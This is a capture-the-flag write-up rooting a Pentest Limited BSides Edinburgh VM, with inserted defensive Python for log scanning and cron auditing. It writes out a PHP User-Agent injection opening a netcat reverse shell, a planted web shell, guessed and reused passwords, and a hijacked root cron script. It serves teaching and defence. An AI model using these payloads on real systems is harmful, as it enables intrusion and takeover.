Pentest Limited's BSides Edinburgh Write up

Security

This is the second VM that I have tried from Pentest Limited. The report of the Securi-Tay CTF challenge can be found here. As usual, I downloaded the VM (located here) and imported it into VirtualBox. Once I had changed the networking to my local host-only network (vmbox0), I was ready to start taking a closer look. Initially, I did a ping sweep to determine the IP address of the target:

# nmap -sP 192.168.56.1/24

Starting Nmap 7.40 ( https://nmap.org ) at 2017-05-20 22:56 BST
Nmap scan report for 192.168.56.100
Host is up (0.000065s latency).
MAC Address: 08:00:27:E0:C9:C2 (Oracle VirtualBox virtual NIC)
Nmap scan report for 888.darknet.com (192.168.56.103)
Host is up (0.0012s latency).
MAC Address: 08:00:27:31:B6:3A (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.1
Host is up.
Nmap done: 256 IP addresses (3 hosts up) scanned in 2.94 seconds

Once I had the IP address, I then performed a port scan of the target to reveal a single TCP port open (80 - HTTP):

# nmap -sT 192.168.56.103

Starting Nmap 7.40 ( https://nmap.org ) at 2017-05-20 22:56 BST
Nmap scan report for 888.darknet.com (192.168.56.103)
Host is up (0.00066s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE
80/tcp open  http
MAC Address: 08:00:27:31:B6:3A (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 0.22 seconds

So without much delay I fired up a web browser, Burp Suite, Arachni and DirBuster and took a closer look.

The initial page I was greeted with looked like this:

[Screenshot: BSides Edinburgh CTF 2017 challenge.]

Hovering over the links, at least one was broken (double https://), but the most interesting part was the information about the browser. This is the User-Agent header, which the client sends to the server and which the PHP code then treats as a variable. Although the browser sets it, the value can be manipulated with Burp Suite.

At this time, DirBuster also completed, and revealed some interesting pages:

[Screenshot: DirBuster results.]

The robots.txt file also pointed to /Dev as a folder of interest, since it is disallowed:

[Screenshot: /Dev directory listing.]

Thinking I couldn't be that lucky, I clicked on the file, which revealed that I wasn't:

[Screenshot: /Dev/passwd file - Todo Backups.]

Going back to the list of pages from DirBuster, test.php stood out. The page was a list of previous connections, again showing the User-Agent. Returning to the index page, I accessed it once more, but changed my User-Agent via Burp to:

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0; <?php `netcat 192.168.56.1 8888 -e '/bin/sh'` ?>

A netcat listener was waiting on port 8888 for my connection. On viewing the test page, the connection sprang into life and I was connected as the user "www-data".

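From the defender's side, the injected User-Agent above is easy to spot in the web server's own access log. The following is an added Python example (my own, not code from the write-up or the challenge) that parses Apache/nginx combined-format access log lines and flags User-Agent values carrying PHP tags, backtick execution or a netcat shell command; the log lines are constructed samples, with the second one carrying the header shown above.

```python
import re

# Apache/nginx "combined" format; the User-Agent is the final quoted field.
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>.*)"$'
)

# Patterns that have no business in a browser's User-Agent string.
INDICATORS = {
    "php_open_tag": re.compile(r"<\?(php|=)", re.IGNORECASE),
    "backtick_exec": re.compile(r"`[^`]+`"),
    "php_exec_call": re.compile(r"\b(system|exec|shell_exec|passthru|eval)\s*\(", re.IGNORECASE),
    "netcat_shell": re.compile(r"\b(nc|netcat)\b.*\s-e\s", re.IGNORECASE),
}

# Constructed sample log lines (not from the original write-up).
SAMPLE_LOG = """\
192.168.56.1 - - [20/May/2017:22:58:01 +0100] "GET /index.php HTTP/1.1" 200 1024 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0"
192.168.56.1 - - [20/May/2017:22:59:10 +0100] "GET /index.php HTTP/1.1" 200 1024 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0; <?php `netcat 192.168.56.1 8888 -e '/bin/sh'` ?>"
192.168.56.1 - - [20/May/2017:23:00:00 +0100] "GET /test.php HTTP/1.1" 200 2048 "-" "curl/7.52.1"
"""

def parse_line(line):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = COMBINED_RE.match(line.rstrip("\r\n"))
    return m.groupdict() if m else None

def flag_user_agent(ua):
    """Names of the indicators that match a User-Agent value."""
    return [name for name, rx in INDICATORS.items() if rx.search(ua)]

def scan_log(text):
    """One record per request whose User-Agent looks like injected code."""
    hits = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        reasons = flag_user_agent(rec["ua"])
        if reasons:
            hits.append({"ip": rec["ip"], "request": rec["req"], "reasons": reasons})
    return hits

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

The same check applies to any place the application writes the header to disk: a log that is later included or evaluated by PHP is exactly what turns a harmless string into code.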
Once on the platform, I then fixed my terminal by running:




bash 2>&1
python -c 'import pty; pty.spawn("/bin/sh")'

Once I had a working terminal, I downloaded the Laudanum shell to the uploads directory (which is world-writable) for more reliable repeat access.

Looking at the /etc/passwd file, I found the following:

$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:103:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:104:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:105:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:106:systemd Bus Proxy,,,:/run/systemd:/bin/false
Debian-exim:x:104:109::/var/spool/exim4:/bin/false
messagebus:x:105:110::/var/run/dbus:/bin/false
statd:x:106:65534::/var/lib/nfs:/bin/false
ctfuser:x:1000:1000:ctfuser,,,:/home/ctfuser:/bin/bash
mysql:x:108:114:MySQL Server,,,:/nonexistent:/bin/false
sshd:x:107:65534::/var/run/sshd:/usr/sbin/nologin
r00t::0:0:0wned:/home/r00t:/bin/sh
r00t::0:0:0wned:/home/r00t:/bin/sh

The last entries were interesting: they looked like a previous hack attempt, with no password set. Unfortunately, I wasn't able to become r00t, since I didn't want to log in via the console within VirtualBox. My reasoning was that if I was going to use the console, I could have rooted the box easily on start-up anyway.

Also, mysql and exim4 being present reminded me of the previous Pentest Limited challenge. I did wonder if the VM had been built from the same template. I tried to log in to mysql as root with the password rorschach, which worked. At this point I was able to become root as per the previous write-up.

This, however, wasn't good enough. I didn't like the fact that I hadn't learned anything and I had got root based entirely by chance. So I went back and had a look again.



Looking in ctfuser's home directory, I found that there was a log-clearing script:

#cat clearlog.sh
#!/bin/sh
echo '' > /var/www/html/9didkaskdhjdfh44/log.txt

Using a symlink to test, I was able to empty a file owned by root in the web server directory, which indicated that root was running the script. The script was also owned by ctfuser. My next logical step was to become root. I tried to brute force the user's password, and my first guess, ctfuser, was correct! Once I was ctfuser, I added a line to the script to start netcat on port 8889, started a local listener and, at the next 5-minute mark, I was greeted with a root prompt. Fixing the terminal again, I captured the flag in /root:

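The escalation above rests on two misconfigurations: a root cron job executing a script that an unprivileged user owns and can edit, and that script truncating a file by shell redirect inside a directory where anyone can plant a symlink. Here is an added Python audit (my own example, not from the write-up or the challenge) that checks both conditions on given paths; demo() builds a constructed temp-directory scenario mirroring the box's layout, and all function names are my own.

```python
import os
import stat
import tempfile

def _writable_by_others(st):
    # True when group or world can modify the inode (or replace entries, for a directory).
    return bool(st.st_mode & (stat.S_IWGRP | stat.S_IWOTH))

def audit_privileged_script(script, expected_uid=0):
    """Findings for a script executed by a privileged cron job (expected owner: root)."""
    findings = []
    st = os.stat(script)  # follows a symlink to the real file
    if st.st_uid != expected_uid:
        findings.append("script_owner_mismatch")  # the clearlog.sh case: owned by ctfuser
    if _writable_by_others(st):
        findings.append("script_writable_by_others")
    parent = os.stat(os.path.dirname(os.path.abspath(script)))
    if parent.st_uid != expected_uid or _writable_by_others(parent):
        findings.append("script_dir_not_controlled_by_owner")  # script can be replaced
    return findings

def audit_redirect_target(target):
    """Findings for a file the privileged script truncates with a shell redirect."""
    findings = []
    if os.path.islink(target):
        findings.append("target_is_symlink")  # '>' follows the link and clobbers its target
    parent = os.stat(os.path.dirname(os.path.abspath(target)))
    if _writable_by_others(parent) and not parent.st_mode & stat.S_ISVTX:
        findings.append("target_dir_writable_by_others")
    return findings

def demo():
    # Constructed scenario: a user-owned script and a world-writable web directory.
    me = os.getuid()
    d = tempfile.mkdtemp()
    script = os.path.join(d, "clearlog.sh")
    with open(script, "w") as f:
        f.write("#!/bin/sh\necho '' > html/log.txt\n")
    os.chmod(script, 0o775)  # group-writable, as a user's own script often is
    webdir = os.path.join(d, "html")
    os.mkdir(webdir)
    os.chmod(webdir, 0o777)  # world-writable web directory, no sticky bit
    log = os.path.join(webdir, "log.txt")
    os.symlink(os.path.join(d, "root_owned.txt"), log)  # planted link; target need not exist
    return {
        "run_as_root": audit_privileged_script(script, expected_uid=me + 1),  # uid mismatch stands in for root
        "run_as_owner": audit_privileged_script(script, expected_uid=me),
        "target": audit_redirect_target(log),
    }
```

Running the same two functions over every command path in /etc/cron* and the root crontab, plus each redirect target those scripts write, turns the lucky find in this write-up into a repeatable host check.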
[Screenshot: The flag captured!]

In conclusion, my main takeaway from this VM was that template reuse is a thing, and can be a pain for defenders. My other takeaway was that I was not happy with the first way I got root, and trying different methods is always fun. While I didn't necessarily learn anything new, the challenge was no less entertaining.
